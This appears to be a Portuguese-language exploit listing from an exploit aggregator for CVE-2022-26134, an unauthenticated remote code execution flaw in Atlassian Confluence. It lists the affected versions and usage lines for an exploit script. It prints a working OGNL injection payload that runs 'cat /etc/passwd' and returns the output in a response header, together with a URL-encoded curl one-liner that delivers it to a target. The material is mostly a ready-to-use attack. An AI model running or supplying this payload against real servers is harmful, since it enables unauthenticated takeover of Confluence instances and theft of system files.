Share
## https://sploitus.com/exploit?id=66468422-89C0-5AC8-9CEA-6B512338FF7C
# 0DAYEXPLOITAtlassianConfluenceCVE-2022-26134

CVE-2022-26134 - Vulnerabilidade de injeção OGNL.
Prova de conceito de script que explora a vulnerabilidade de execução remota de código que afeta o Atlassian Confluence 7.18 e produtos inferiores. A vulnerabilidade de injeção OGNL permite que um usuário não autenticado execute código arbitrário em uma instância do Confluence Server ou Data Center.

Versões afetadas
Todas as versões com suporte do Confluence Server e Data Center são afetadas.
As versões do Confluence Server e Data Center posteriores a 1.3.0 e abaixo de 7.18.1 são afetadas.
A vulnerabilidade tem uma pontuação CVSS de 10 em 10 para criticidade.

Então você pode executar o exploit com o comando de sua escolha da seguinte forma:

python3 exploit.py https://target.com CMD
python3 exploit.py https://target.com id
python3 exploi.py https://target.com "ps aux"


Carga útil
${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
Exemplo com o comando CURL:

curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D" 
Em seguida, o resultado do comando será refletido no parâmetro X-Cmd-Responseno cabeçalho de resposta.